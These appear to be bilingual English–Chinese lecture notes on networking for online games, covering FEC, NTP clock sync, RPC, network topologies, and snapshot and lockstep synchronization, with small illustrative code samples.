| 1 | 1 | 0 |

| Law 定律 | Desc 描述 |
| --- | --- |
| Law of identity 同一律 | A xor 0 = A |
| Zeroing law 零律 | A xor A = 0 |
| Commutative law 交换律 | A xor B = B xor A |
| Associative law 结合律 | A xor (B xor C) = (A xor B) xor C |

    C = A xor B

    A = A xor (B xor B) = (A xor B) xor B = C xor B

    B = (A xor A) xor B = A xor C

    • There are four packets A, B, C, D
      • Let E = XOR (A, B, C, D)
      • A = XOR (B, C, D, E)
      • B = XOR (A, C, D, E)
      • C = XOR (A, B, D, E)
      • D = XOR (A, B, C, E)

    webp

    If any packet is lost, it can be recovered with the other four packets.

    如果任何一个数据包丢失,可以用其他四个数据包恢复。

Only one packet can be lost in continuous data. If $A$ and $B$ are lost at the same time, the algorithm cannot recover.

    连续数据中只能丢失一个数据包。如果 $A$ 和 $B$ 同时丢失,则算法无法恢复。
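
​异或恢复的过程可以用几行 Python 验证(笔者补充的示意):

def xor_bytes(*packets):
    # 对若干等长数据包逐字节异或
    out = bytearray(len(packets[0]))
    for p in packets:
        for i, b in enumerate(p):
            out[i] ^= b
    return bytes(out)

A, B, C, D = b'AAAA', b'BBBB', b'CCCC', b'DDDD'
E = xor_bytes(A, B, C, D)             # 冗余包 E = XOR(A, B, C, D)

recovered_C = xor_bytes(A, B, D, E)   # 假设 C 丢失,用其余四个包恢复
assert recovered_C == C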

    Reed-Solomon Codes

    里德-所罗门码

    There are $N$ valid data, and $M$ FEC data are expected to be generated

    有 $N$ 个有效数据,预计将生成 $M$ 个 FEC 数据

    • Form $N$ valid data into a unit vector $D$

      将 $N$ 个有效数据转换为单位向量 $D$

• Generate a transformation matrix $B$: it is composed of an $N$-order identity matrix and an $N * M$ Vandermonde matrix (the matrix composed of any $N$ rows of matrix $B$ is invertible)

  生成一个变换矩阵 $B$:它由一个 $N$ 阶单位矩阵和一个 $N * M$ 的范德蒙德(Vandermonde)矩阵组成(矩阵 $B$ 的任意 $N$ 行组成的矩阵都是可逆的)

• The matrix $G$ obtained by multiplying the matrix $B$ and vector $D$ contains $M$ redundant FEC data

  将矩阵 $B$ 与向量 $D$ 相乘得到的矩阵 $G$ 包含 $M$ 个冗余 FEC 数据

    webp

    Assume $D1$, $D4$, $C2$ are lost

    假设 $D1$、$D4$、$C2$ 丢失

    • The $B$ matrix also needs to delete the corresponding $M$ rows to obtain a deformation matrix of $B’$

      $B$ 矩阵还需要删除相应的 $M$ 行,以获得 $B’$ 的变形矩阵

    webp

• Invert matrix $B'$ to get $B'^{-1}$

  对矩阵 $B'$ 求逆,得到 $B'^{-1}$

    • Multiply $B’^{-1}$ on both sides to recover the original data

      将两侧的 $B’^{-1}$ 相乘以恢复原始数据

    webp

    Customize Your UDP based on ARQ and FEC

    基于 ARQ 和 FEC 自定义 UDP

    Reliability

    可靠性

    • Use Selective Repeat ARQ

      使用选择性重复 ARQ

    Hybrid ARQ and FEC

    混合 ARQ 和 FEC

    • Before ARQ, FEC is used for error correction

      在 ARQ 之前,FEC 用于纠错

    Real-time

    实时

    • Smaller RTO growth

      RTO 增长较小

    • No congestion control

      无拥堵控制

    • Fast retransmission mechanism

      快速重传机制

    • No delay ACK

      无延迟确认

    Flexibility

    灵活性

    • Design protocol for speed

  为速度而设计协议

    • Support both reliable and unreliable transmission

      支持可靠和不可靠的传输

    Clock Synchronization

    时钟同步

    RTT

    Round-Trip Time

    往返时间

    • Send/Recv delay

      发送/接收延迟

    • Propagation delay

      传播延迟

    • Response time of the origin server

      源服务器的响应时间

    RTT vs. Ping

• Ping tests are usually performed within a transport protocol that uses ICMP packets

  Ping 测试通常在使用 ICMP 数据包的传输协议中执行

    • RTT is measured at the application layer

      RTT 在应用层进行测量

    RTT vs. Latency

• Latency is the time required for a data packet to travel from the sending endpoint to the receiving endpoint (only one trip)

  延迟是数据包从发送端点传输到接收端点所需的时间(仅单程)

    webp

    Network Time Protocol (NTP)

    网络时间协议(NTP)

Network Time Protocol is an internet protocol used to synchronize with computer clock time sources in a network.

    网络时间协议是一种用于与网络中的计算机时钟时间源同步的互联网协议。

    • Reference clock

      参考时钟

• GPS clock or radio transmitting station

  GPS 时钟或无线电发射站

• Amazingly precise timekeeping devices such as atomic clocks

  令人惊叹的精确计时设备,如原子钟

      • Not connected to the internet

        未连接到互联网

      • Send their time through radio or optical fiber

        通过无线电或光纤发送他们的时间

    Time Server Stratums

    时间服务器层

    Stratum Values

    • Degrees of separation from the reference clock

      与参考时钟的分离程度

    • Reference clock has stratum value of 0

      参考时钟的层值为 0

    • Servers with stratum value 1 is called primary time servers

      层值为 1 的服务器称为主时间服务器

    • If a device’s stratum value is over 15, its time is not trustworthy

      如果设备的层值超过 15,则其时间不可信

    • Device will choose server with less stratum value automatically when correcting time

      设备在校正时间时会自动选择层值较小的服务器

    webp

    NTP Algorithm

    NTP 算法

    Use NTP is quite simple, just like this

    使用 NTP 非常简单,就像这样

    • Client ask time server for time

      客户端向时间服务器请求时间

    • Server receives the request and reply

      服务器接收请求和回复

    • Client receives the reply

      客户端收到回复

    But we have to do something with the Delay!

    但我们必须对延迟做点什么!

    webp

We record 4 timestamps as $t^c_0, t^s_1, t^s_2, t^c_3$

    webp

$\mathrm{Round\ Trip\ Delay}=(t^c_3-t^c_0)-(t^s_2-t^s_1)$

$\mathrm{Offset}=\frac{(t^s_1-t^c_0)+(t^s_2-t^c_3)}{2}$

The implicit assumption is that the one-way delay is statistically half the round-trip delay

隐含假设:单向延迟在统计上是往返延迟的一半

Local-clock correction is computed from the offset data by:

根据偏移数据计算本地时钟校正:

    • $t^c_3 + \mathrm{Offset}$

*The delay and clock-offset samples obtained can be filtered using maximum-likelihood techniques

    *获得的延迟和时钟偏移样本可以使用最大似然技术进行滤波

    Let’s take an example:

    让我们举一个例子:

It’s 17:01:00 on the client; it’s 17:01:30 on the server.

此时客户端时间为 17:01:00,服务器时间为 17:01:30。

• $t^c_0$ is 17:01:00(客户端发出请求,此刻服务器真实时间 17:01:30)
• $t^s_1$ is 17:01:32(服务器收到请求)
• $t^s_2$ is 17:01:33(服务器发出回复)
• $t^c_3$ is 17:01:05(客户端收到回复,此刻服务器真实时间 17:01:35)

$\mathrm{Round\ Trip\ Delay}=(t^c_3-t^c_0)-(t^s_2-t^s_1)$ = (05 - 00) - (33 - 32) = 4s

$\mathrm{Offset}=\frac{(t^s_1-t^c_0)+(t^s_2-t^c_3)}{2}$ = (32 - 00 + 33 - 05) / 2 = 30s

    So at $t^c_3$ client’s time is corrected to:

    • $t^c_3 + \mathrm{Offset}= 17:01:35$
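
​把上面的公式写成代码,可以直接验证这个例子(笔者补充的示意,时间取 17:01:00 为 0 秒):

def ntp_correction(t0, t1, t2, t3):
    # t0/t3 为客户端发送/接收时刻,t1/t2 为服务器接收/发送时刻(秒)
    round_trip_delay = (t3 - t0) - (t2 - t1)
    offset = ((t1 - t0) + (t2 - t3)) / 2
    return round_trip_delay, offset

delay, offset = ntp_correction(0, 32, 33, 5)
print(delay)   # 4.0,即 Round Trip Delay = 4s
print(offset)  # 30.0,即 Offset = 30s,校正后 t3 = 17:01:05 + 30s = 17:01:35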

    Stream-Based Time Synchronization with Elimination of Higher Order Modes

    基于流的时间同步,消除高阶模式

    1. Client stamps current local time on a “time request” packet and sends to server

    ​客户端在“时间请求”数据包上标记当前本地时间并发送到服务器

    2. Upon receipt by server, server stamps server-time and returns

    ​服务器收到后,服务器标记服务器时间并返回

3. Upon receipt by client, a time delta is calculated by delta = (current time - sent time) / 2

​客户端收到后,通过 delta = (当前时间 - 发送时间) / 2 计算时间增量

So far this algorithm is very similar to NTP

到目前为止,该算法与 NTP 非常相似

4. The first result should immediately be used to update the clock

    ​第一个结果应立即用于更新时钟

    5. The client repeats Steps 1-3 (NTP-like process), five or more times

    ​客户端重复步骤1-3(类似 NTP 的过程)五次或更多次

6. The results of the packet receipts are accumulated and sorted in ascending order by latency

​数据包接收的结果按延迟升序累积和排序

7. All samples above approximately 1.5 times the median latency are discarded, and the remaining samples are averaged using an arithmetic mean

​丢弃延迟超过中位数约 1.5 倍的所有样本,并对剩余样本取算术平均值

    webp
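
​第 5~7 步的统计滤波可以按描述直接实现(笔者补充的示意):

import statistics

def filtered_offset(samples):
    # samples: [(latency, offset), ...];按延迟升序排序,
    # 丢弃延迟超过中位数 1.5 倍的样本,剩余 offset 取算术平均
    samples = sorted(samples)
    median_latency = statistics.median(lat for lat, _ in samples)
    kept = [off for lat, off in samples if lat <= 1.5 * median_latency]
    return sum(kept) / len(kept)

samples = [(0.040, 0.30), (0.042, 0.31), (0.045, 0.29),
           (0.120, 0.55), (0.043, 0.30)]   # 高延迟样本 (0.120, 0.55) 会被丢弃
print(round(filtered_offset(samples), 3))  # 0.3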

Remote Procedure Call (RPC)

    远程过程调用(RPC)

    Socket Programming: Still not Great

    Socket 编程:仍然不太好

    • Lots for the programmer to deal with every time

      程序员每次都要处理很多事情

      • How to separate different requests on the same connection?

        如何在同一连接上分离不同的请求?

      • How to write bytes to the network/read bytes from the network?

        如何向网络写入字节/从网络读取字节?

      • What if Host A’s process is written in Go and Host B’s process is in C++?

        如果主机 A 的进程是用 Go 编写的,而主机 B 的进程是 C++ 编写的呢?

      • What to do with those bytes?

        如何处理这些字节?

    • Still pretty painful… have to worry a lot about the network

      仍然很痛苦…不得不非常担心网络

      • Have you received the message?

        你收到消息了吗?

    Communication with Messages

    消息通信

    webp

    Communication Way

    沟通方式

    Initially, people “hand-coded” messages to send requests and responses

    最初,人们“手工编码”消息以发送请求和响应

    • Message is a stream of bytes-“op codes” and operands

      消息是字节流-“操作码”和操作数

    Lots of drawbacks

    很多缺点

    • Need to worry about message format

      需要担心消息格式

    • Have to pack and unpack data from messages

      必须从消息中打包和解包数据

    • Servers have to decode messages and dispatch them to handlers

      服务器必须解码消息并将其分派给处理程序

    • Messages are often asynchronous

      消息通常是异步的

      • After sending one, what do you do until the response comes back?

        发送一个后,在收到回复之前,你会做什么?

    • Messages aren’t a natural programming mode

      消息不是一种自然的编程模式

#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>

struct foomsg {
    uint32_t len;
};

void send_foo(int outsock, char *contents) {
    int msglen = sizeof(struct foomsg) + strlen(contents);
    char *buf = malloc(msglen);
    struct foomsg *fm = (struct foomsg *)buf;
    fm->len = htonl(strlen(contents));   // 长度字段转为网络字节序
    memcpy(buf + sizeof(struct foomsg), contents, strlen(contents));
    write(outsock, buf, msglen);         // outsock 为已建立连接的套接字
    free(buf);
}

    More Challenges on Logic Communication

    逻辑通信面临更多挑战

    • For a remote procedure call, a remote machine may:

      对于远程过程调用,远程机器可以:

      • Run process written in a different language

        运行用其他语言编写的进程

      • Represent data types using different sizes

        使用不同大小表示数据类型

      • Use a different byte ordering (endianness)

        使用不同的字节顺序(字节序)

      • Represent floating point numbers differently

        以不同的方式表示浮点数

      • Have different data alignment requirements

        有不同的数据对齐要求

        e.g., 4-byte type begins only on 4-byte memory boundary

        例如,4 字节类型仅在 4 字节内存边界上开始

    Remote Procedure Call (RPC)

    远程过程调用(RPC)

• RPC is a request-response protocol. An RPC is initiated by the client, which sends a request message to a known remote server to execute a specified procedure with supplied parameters

  RPC 是一种请求-响应协议。RPC 由客户端发起,它向已知的远程服务器发送请求消息,以使用提供的参数执行指定的过程

    • Goals

      目标

      • Ease of programming

        易于编程

      • Hide complexity

        隐藏复杂性

      • Familiar model for programmers (just make a function call)

        程序员熟悉的模型(只需进行函数调用)

    webp

    RPC example

    • Go language

    webp

    • Output

      Hello World
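
​幻灯片中的示例是 Go 代码(见上图)。这里用 Python 标准库的 xmlrpc 写一个等价的最小 RPC 示例(笔者补充,仅作演示):

# server.py —— 注册一个可被远程调用的过程
from xmlrpc.server import SimpleXMLRPCServer

def hello(name):
    return 'Hello ' + name

server = SimpleXMLRPCServer(('localhost', 8000), logRequests=False)
server.register_function(hello)
server.serve_forever()

# client.py —— 像调用本地函数一样调用远程过程
import xmlrpc.client

proxy = xmlrpc.client.ServerProxy('http://localhost:8000/')
print(proxy.hello('World'))   # 输出:Hello World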

    Why RPC?

    为什么选择 RPC?

    • Goal: Easy-to-program network communication that makes client-server communication transparent

      目标:易于编程的网络通信,使客户端-服务器通信透明

      • Retains the “feel” of writing centralized code

        保留编写集中式代码的“感觉”

      • Programmers needn’t think about the network

        程序员不必考虑网络

      • Make communication appear like a local procedure call

        使通信看起来像本地过程调用

    • Don’t need to worry about serialization/deserialization for network

      无需担心网络的序列化/反序列化

    • Don’t need to worry about complexities of network

      无需担心网络的复杂性

    Interface Definition Language

    接口定义语言

• A server defines the service interface using an interface definition language (IDL)

  服务器使用接口定义语言(IDL)定义服务接口

  The IDL specifies the names, parameters, and types for all client-callable server procedures

  IDL 指定了所有客户端可调用的服务器过程的名称、参数和类型

      • example: ASN.1 in the OSI reference model

        示例:OSI 参考模型中的 ASN.1

      • example: Protobuf (Google’s data interchange format)

        示例:Protobuf(谷歌的数据交换格式)

// polyline.proto
syntax = "proto2";

message Point {
    required int32 x = 1;
    required int32 y = 2;
    optional string label = 3;
}

message Line {
    required Point start = 1;
    required Point end = 2;
    optional string label = 3;
}

message Polyline {
    repeated Point point = 1;
    optional string label = 2;
}

    RPC Stubs

    • A client-side stub is a procedure that looks to the client as if it were a callable server procedure

      客户端存根是一个过程,它在客户端看起来就像是一个可调用的服务器过程

      • The client program thinks it’s invoking the server butit’s calling into the client-side stub

        客户端程序认为它正在调用服务器,但它正在调用客户端存根

• A server-side stub looks like a caller to the server

      服务器端存根看起来像是服务器的调用者

      • The server program thinks it’s called by the client but it’s really called by the server-side stub

        服务器程序认为它是由客户端调用的,但实际上是由服务器端存根调用的

    • The stubs send messages to each other to make the RPC happen transparently

      存根相互发送消息,使 RPC 透明地发生

    webp

    Stub compiler

    • A “stub compiler” reads the IDL declarations and produces two stub procedures for each server procedure

      “存根编译器”读取 IDL 声明,并为每个服务器过程生成两个存根过程

      • The server programmer implements the service’s procedures and links them with the server-side stubs

        服务器程序员实现服务的过程,并将其与服务器端存根链接起来

      • The client programmer implements the client program and links it with the client-side stubs

        客户端程序员实现客户端程序并将其与客户端存根链接

      • The stubs manage all of the details of remote communication between client and server

        存根管理客户端和服务器之间远程通信的所有细节

Real RPC Package Journey

一个真实 RPC 包的旅程

    webp

    Network Topology

    网络拓扑

    Original Peer-to-Peer (P2P)

    原始点对点(P2P)

• Each client broadcasts game events to all the others

  每个客户端向所有其他客户端广播游戏事件

    • Robustness

      稳健性

    • Cheating is much easier

      作弊要容易得多

• Synchronization is required among all nodes to maintain the consistency of the distributed game state

      所有节点之间需要同步,以保持分布式游戏状态的一致性

    webp

    P2P with Host Server

    P2P 与主机服务器(如 CS)

    • A player can act as “server”, known as host

      玩家可以充当“服务器”,即主机

    • If host disconnected, the game may end

      如果主机断开连接,游戏可能会结束

• The host needs to handle game actors that cannot be controlled by players, such as bots

  主机需要处理玩家无法控制的游戏角色,如机器人

    webp

    P2P Games

    P2P 游戏

• No reliance on a server

  不依赖服务器

• Commonly used in LAN

  常用于局域网

• The “Host” is basically in control of the sessions

  “主机”基本上控制着会话

    • A limited number of players at once

      一次玩家数量有限

    webp

    Dedicated Server

    专用服务器

    • Authority

      权威机构

    • Simulate game world

      模拟游戏世界

    • Dispatch data to players

      向玩家发送数据

    • High performance requirements

      高性能要求

    webp

    P2P vs Dedicated Server

    P2P 与专用服务器

| | P2P | Dedicated Server |
| --- | --- | --- |
| Pros | 1. Robustness 稳健性<br>2. Removes the “server issues” problem in multiplayer sessions 消除多人会话中的“服务器问题”<br>3. No extra cost on server 服务器无额外成本 | 1. Easy to maintain as well as cheating avoidance 易于维护,避免作弊<br>2. Can handle massive game world 可以处理大型游戏世界<br>3. Responsiveness of the game does not rely on the network conditions of each individual client 游戏的响应性不依赖于每个客户端的网络状况 |
| Cons | 1. Cheating is much easier 作弊要容易得多<br>2. Every player needs a decent network connection for the game to function properly 每个玩家都需要像样的网络连接,游戏才能正常运行<br>3. Can only handle a limited number of players 只能处理有限数量的玩家 | 1. High cost on server 服务器成本高<br>2. Much more work on server side program 服务器端程序的工作量大得多<br>3. Single point of failure 单点故障 |

    When RTT is too high

    RTT 过高时

    • When players are in different countries, far away, or when the network environment is complex

      当玩家身处不同的国家、遥远的地方,或者网络环境复杂时

    • Use dedicated line and edge gateway to reduce latency

      使用专用线路和边缘网关来减少延迟

    webp

    Game Synchronization

    游戏同步

    Single-Player Gaming

    Game Tick

    • Player inputs

      玩家输入

    • Convert to game commands

      转换为游戏命令

    • Game logic

      游戏逻辑

    • Game render

      游戏渲染

    For Player

    对于玩家

    • Player inputs

      玩家输入

    • Consistency in each other

      彼此的一致性

    webp

    Online Gaming

    在线游戏

    For Player

    对于玩家

    • Player inputs

      玩家输入

    • Consistency in each other

      彼此的一致性

    How to play together at different terminals?

    如何在不同的终端上一起玩?

    • Game commands

      游戏命令

    • Game Logic

      游戏逻辑

    webp

    Game Synchronization

    游戏同步

To answer the demand for responsive strategies, the synchronization rule is designed to solve the delay and consistency of all destinations.

为了满足对响应速度的需求,同步规则被设计用来解决所有端的延迟和一致性问题。

    Synchronization Methods

    同步方法

    webp

| Snapshot 快照 | Lockstep 锁步 | State Synchronization 状态同步 |
| --- | --- | --- |
| Quake | Honor of Kings 王者荣耀 | Counter Strike 反恐精英 |

    Snapshot Synchronization

    快照同步

    webp

    • Client sends inputs to server

      客户端向服务器发送输入

    • Server simulates the game world

      服务器模拟游戏世界

• Generates whole game state snapshots

  生成整个游戏状态的快照

• Sends them down to clients

  将它们下发给客户端

    • Client updates the display according to the snapshot

      客户端根据快照更新显示

Snapshot Synchronization - Jitter and Hitches

快照同步——抖动和卡顿

• Server tick rate is limited

  服务器 tick 率有限

    • Performance

      性能

    • Bandwidth

      带宽

    Snapshot Interpolation

    快照插值

• Not rendering immediately after a snapshot is received

  收到快照后不立即渲染

    • Keep an interpolation buffer

      保留插值缓冲区

    • Interpolation between the two delayed snapshots

      两个延迟快照之间的插值
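
​插值缓冲的思路可以用几行代码说明:渲染时刻故意落后最新快照一小段时间,在前后两个快照之间做线性插值(笔者补充的示意):

INTERP_DELAY = 0.1   # 渲染落后最新快照 100ms(假设值)

def interpolate(snapshots, render_time):
    # snapshots: [(time, position), ...],按时间升序
    t = render_time - INTERP_DELAY
    for (t0, p0), (t1, p1) in zip(snapshots, snapshots[1:]):
        if t0 <= t <= t1:
            alpha = (t - t0) / (t1 - t0)
            return p0 + (p1 - p0) * alpha   # 在两个延迟快照之间插值
    return snapshots[-1][1]                 # 缓冲不足时退化为最新快照

snaps = [(0.00, 0.0), (0.05, 1.0), (0.10, 2.0), (0.15, 3.0)]
print(interpolate(snaps, 0.175))   # t = 0.075,落在 0.05~0.10 之间,输出 1.5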

Delta Compression

增量压缩(Delta Compression)

    • Only sync snapshot delta to client

      仅将快照增量同步到客户端

• Example: Quake 3

    webp
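
​增量压缩的核心可以用字典差分来示意:服务器只下发与上一个已确认快照不同的字段,客户端再把增量应用到旧快照上(笔者补充的简化示意,Quake3 实际是在比特级字段上做 delta):

def make_delta(prev, curr):
    # 只保留发生变化(或新增)的字段
    return {k: v for k, v in curr.items() if prev.get(k) != v}

def apply_delta(prev, delta):
    # 在旧快照上应用增量,得到新快照
    out = dict(prev)
    out.update(delta)
    return out

s0 = {'hp': 100, 'x': 10.0, 'y': 5.0}
s1 = {'hp': 100, 'x': 12.5, 'y': 5.0}
delta = make_delta(s0, s1)          # {'x': 12.5},只需同步这一项
assert apply_delta(s0, delta) == s1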

Snapshot Synchronization

快照同步

• 60 Hz

• Max Bandwidth 4.5 Mbps

  最大带宽 4.5 Mbps

Delta Compression

增量压缩

• 60 Hz

• Max Bandwidth 676 kbps

  最大带宽 676 kbps

    Synchronizing Snapshot

同步快照

    • Client performance is wasted

      客户端性能被浪费

    • High server pressure

      服务器压力高

    • High data volume and high bandwidth requirements

      高数据量和高带宽要求

    • As games get more complex, snapshots get bigger

      随着游戏变得越来越复杂,快照也越来越大

    Lockstep Synchronization

    锁步同步

    Lockstep Origin

    锁步原点

Lockstep synchronization, used in military simulation, is by far the simplest technique to ensure consistency

用于军事模拟的锁步同步是迄今为止确保一致性的最简单技术。

    • Same Result

      相同的结果

    • Same time

      同一时间

    • Same action

      同样的行动

    No member is allowed to advance its simulation clock until all others members have acknowledged that they are done.

    在所有其他成员确认完成之前,任何成员都不允许提前其模拟时钟。

    webp

    In particular, it is clear that a totally ordered delivery is a sufficient condition to ensure game state consistency across different nodes, as it guarantees that all generated events are reliably delivered according to the same unique order.

    特别是,很明显,完全有序的交付是确保不同节点之间游戏状态一致性的充分条件,因为它保证了所有生成的事件都按照相同的唯一顺序可靠地交付。

    Lockstep in Online Game

    网络游戏中的锁步

    Lockstep Principle.

    锁步原理。

    webp

    First Game Used Lockstep

    第一个游戏使用锁步

• The network synchronization method of DOOM (1994) was pointed out in a 2006 paper

      2006 年的一篇论文指出了 DOOM(1994)的网络同步方法

    • Lockstep is not mentioned in the paper, but it is now generally accepted that Doom (1994) was the first multiplayer FPS online game to use this type of synchronization

      论文中没有提到锁步,但现在人们普遍认为《毁灭战士》(1994)是第一款使用这种同步的多人 FPS 在线游戏

    • It uses P2P architecture

      它使用 P2P 架构

    webp

    Lockstep initialization

    锁步初始化

    Loading…

    加载…

    • Ensure that the initial data of each client is deterministic

      确保每个客户端的初始数据是确定的

      • Game model

        游戏模型

      • Static data

        静态数据

    • Synchronize clock

      同步时钟

    Deterministic Lockstep

    确定性锁步

    • Client sends inputs to Server

      客户端向服务器发送输入

    • Server receives and sorts

      服务器接收和排序

    • Wait for input from all clients before forwarding

      转发前等待所有客户端的输入

    • After receiving data from the server, the client executes the game logic

      在从服务器接收到数据后,客户端执行游戏逻辑

    webp

    If Player B’s message B2 arrives later? (The dotted line B2 in the figure)

    如果玩家 B 的消息 B2 稍后到达?(图中虚线 B2)

    • Disadvantages

      缺点

      • Game progress depends on slowest player

        游戏进度取决于最慢的玩家

• The delay of the game is not fixed, and the experience is not good

  游戏的延迟不固定,体验不好

      • All the players will wait if a player offline

        如果有玩家离线,所有玩家都会等待

    webp

    Player Offline in Deterministic Lockstep

    确定性锁步中的玩家离线

    Waiting for players…

    正在等待玩家…

    webp

    Bucket Synchronization

    Bucket 同步

    • Bucket: a fixed time period

      Bucket:固定时间段

• Each bucket

  每个 bucket(固定时间片)

  • Collect all instructions

    收集所有指令

      • Broadcast to all players

        向所有玩家广播

    • There is no need to wait for all players’ commands to be received before forwarding

      转发前无需等待收到所有玩家的命令

    webp
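
​Bucket 同步的服务器主循环大致如下:按固定时间片收集指令,到点就广播,不等慢的玩家(笔者补充的示意):

import time

BUCKET = 0.066   # 每个 bucket 约 66ms,相当于 15Hz 逻辑帧(假设值)

def bucket_loop(recv_commands, broadcast):
    # recv_commands():取走这段时间内收到的所有玩家指令
    # broadcast():把整理好的一帧指令发给所有客户端
    frame_id = 0
    next_tick = time.monotonic() + BUCKET
    while True:
        commands = []
        while time.monotonic() < next_tick:   # 本 bucket 内持续收集指令
            commands.extend(recv_commands())
            time.sleep(0.001)
        broadcast({'frame': frame_id, 'commands': commands})  # 到点统一广播
        frame_id += 1
        next_tick += BUCKET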

    A Good Trade-off between Consistency and Interactivity Maintenance

    一致性和交互性维护之间的良好权衡

So we need to find a basic balance between them.

因此,我们需要在两者之间找到一个基本的平衡点。

    The threshold:

    阈值:

As soon as the measured interactivity degree decreases below a given threshold, some procedure skips processing obsolete game events with the aim of bringing back a satisfactory interactivity level.

一旦测得的交互性程度降到给定阈值以下,就通过某种机制跳过处理过时的游戏事件,以恢复令人满意的交互性水平。

    webp

    Deterministic Difficulties

    确定性难题

    • Deterministic

      确定性

      • The same input sequence need to produce the same game state on all machines

        相同的输入序列需要在所有机器上产生相同的游戏状态

    • Deterministic is Hard

      确定性很难

      • Floating point

        浮点型

      • Random number

        随机数

      • Containers and algorithms (sort, add, remove, etc.)

        容器和算法(排序、添加、删除等)

      • Math tools (vectors, quaternions, etc)

        数学工具(向量、四元数等)

      • Physics simulation (very difficult)

        物理模拟(非常困难)

      • Code logic execution order

        代码逻辑执行顺序

    webp

    Floating Point Numbers

    浮点数

• Because computers use binary, these numbers can be accurately represented

  由于计算机采用二进制,这些数字可以被精确表示

      • 0.5 = 1/2
      • 0.25 = 1/4
      • 0.75 = 1/2 + 1/4
      • 0.875 = 1/2 + 1/4 + 1/8
    • Such numbers can only be approximated

      这些数字只能近似表示

      • 2/3 ≈ 0.66…7

    webp

• Floating point numbers must comply with the IEEE 754 standard

  浮点数必须符合 IEEE 754 标准


• Floating point numbers conform to the IEEE 754 standard

  浮点数符合 IEEE 754 标准

    • But different platforms may have different behavior

      但不同的平台可能有不同的行为


    Floating Point Hardware & OS Behaviour

    浮点硬件和操作系统行为

• Intel / AMD

• PS / Xbox

• Windows / Linux

• Android / iOS


    Floating Point Compilers Behaviour

    浮点编译器行为

• Math Library (sin, cos, tan, exp, pow …)

  数学库(sin、cos、tan、exp、pow…)

    • Third party components

      第三方组件

    • Different platforms

      不同的平台

    • Different versions

      不同版本

    • Different languages

      不同的语言


    Idea: Avoid problems on the precision boundary, customize the precision

    理念:避免精度边界问题,定制精度

    • Fixed-point math library

      定点数学库

    • Look-up table (trigonometric functions, etc.)

      查找表(三角函数等)

    • Amplification and truncation

      放大和截断

    Simple method

    简单的方法

    • Multiply by 1000, then divide by 1000, there is an overflow risk

      乘以 1000,然后除以 1000,存在溢出风险

    • The numerator and denominator are represented by fixed-point numbers (2/3)

      分子和分母由定点数(2/3)表示


    One Solution: Fixed point math

    一种解决方案:定点数

    A fixed-point number can be split into three parts

    一个定点数可以分成三部分

    • An optional sign bit

      可选符号位

    • An integer

      一个整数

    • A fractional part

      分数部分

• Need to implement addition, subtraction, multiplication, division, etc.

  需要实现加、减、乘、除等运算

    • Implement class, class methods

      实现类、类方法

    • Performance needs to be considered

      需要考虑性能

    webp

$$V=(-1)^{b_{f+i}}\left(\sum_{n=0}^{i}2^{n}b_{n+f}+\sum_{m=1}^{f}2^{-m}b_{f-m}\right)$$
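
​下面是一个最小的定点数实现(16 位小数的 Q 格式),演示上式中整数位与小数位的拆分以及四则运算(笔者补充的示意,真实项目还要处理溢出、取负等情况):

FRAC_BITS = 16          # 小数位数 f(假设值)
ONE = 1 << FRAC_BITS    # 1.0 对应的内部整数

class Fixed:
    # 用整数 raw 存储 value * 2^f 的定点数
    def __init__(self, raw):
        self.raw = raw

    @classmethod
    def from_float(cls, x):
        return cls(int(round(x * ONE)))

    def to_float(self):
        return self.raw / ONE

    def __add__(self, other): return Fixed(self.raw + other.raw)
    def __sub__(self, other): return Fixed(self.raw - other.raw)
    def __mul__(self, other): return Fixed((self.raw * other.raw) >> FRAC_BITS)
    def __truediv__(self, other): return Fixed((self.raw << FRAC_BITS) // other.raw)

a = Fixed.from_float(2.0) / Fixed.from_float(3.0)
print(a.raw, a.to_float())   # 43690 0.666656494140625,纯整数运算,各平台结果一致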

    Random Number

    随机数

    • Random problems in the game

      游戏中的随机问题

      • Trigger of random events, npc random birthplace

        随机事件触发,NPC 随机出生地

      • A random attribute of the attack, e.g. critical strike chance

        攻击的随机属性,例如暴击机会

    • These logics are generally implemented with random numbers

      这些逻辑通常用随机数实现

    • How to implement random logic that is completely consistent for multiple players

      如何为多个玩家实现完全一致的随机逻辑

    webp

    • Random numbers are pseudorandom

      随机数是伪随机的

    • Before the game starts, initialize the random number seed

      在游戏开始之前,初始化随机数种子

    • For different players’ clients, the number of random function calls is fixed, and the generated random numbers are the same

      对于不同玩家的客户端,随机函数调用的数量是固定的,生成的随机数是相同的

    webp

#include <iostream>
#include <random>

int main() {
    std::default_random_engine e;
    std::uniform_int_distribution<int> u(0, 100);
    e.seed(80);  // 固定随机数种子,各客户端生成完全相同的序列

    for (int i = 0; i < 20; i++) {
        std::cout << u(e) << std::endl;
    }

    return 0;
}

    Deterministic Solution

    确定性解

    • Fixed-point numbers represent floating-point numbers in critical game logic

      定点数表示关键游戏逻辑中的浮点数

    • Deterministic random algorithm

      确定性随机算法

    • Deterministic containers and algorithms (sort, add, remove, etc.)

      确定性容器和算法(排序、添加、删除等)

    • Deterministic math tools (vectors, quaternions, etc.)

      确定性数学工具(向量、四元数等)

    • Deterministic physics simulation (very difficult)

      确定性物理模拟(非常困难)

    • Deterministic execution order

      确定性执行顺序

    webp

    Tracing and Debugging

    跟踪和调试

    Method of get checksum

    获取校验和的方法

    • All data checksum

      所有数据校验和

    • Key data checksum

      关键数据校验和

    • Other methods

      其他方法

    Automatically locate BUG

    自动定位 BUG

    • Server compares different client’s checksums

      服务器比较不同客户端的校验和

    • Client uploads 50 frames of full logs

      客户端上传 50 帧完整日志

    • Find inconsistencies in the compared logs

      查找比较日志中的不一致之处

    webp
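
​关键数据校验和的思路:每个逻辑帧把关键状态(如各单位的位置、血量)做确定性序列化后求哈希,比对各客户端上报的哈希即可定位开始不同步的帧(笔者补充的示意):

import hashlib
import json

def key_checksum(frame_id, state):
    # sort_keys 保证序列化结果确定;state 中的数值应来自定点数等确定性计算
    payload = json.dumps({'frame': frame_id, 'state': state}, sort_keys=True)
    return hashlib.md5(payload.encode()).hexdigest()

def find_desync(client_a, client_b):
    # client_a / client_b: {frame_id: checksum};返回第一个不一致的帧号
    for frame_id in sorted(client_a):
        if client_a.get(frame_id) != client_b.get(frame_id):
            return frame_id
    return None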

    Lag and Delay

    延迟和延误

    • Client send operation

      客户端发送操作

    • Receive the operation of this frame from the server

      从服务器接收此帧的操作

    • execute

      执行

Lag: The network is unstable. If you wait until you receive a new frame, there will be a lag

滞后:网络不稳定。如果等到收到新帧才执行,就会产生卡顿

    Solution

    解决方案

    • use buffer to cache frames

      使用缓冲区缓存帧

      • Large buffer, large delay

        缓冲区大,延迟大
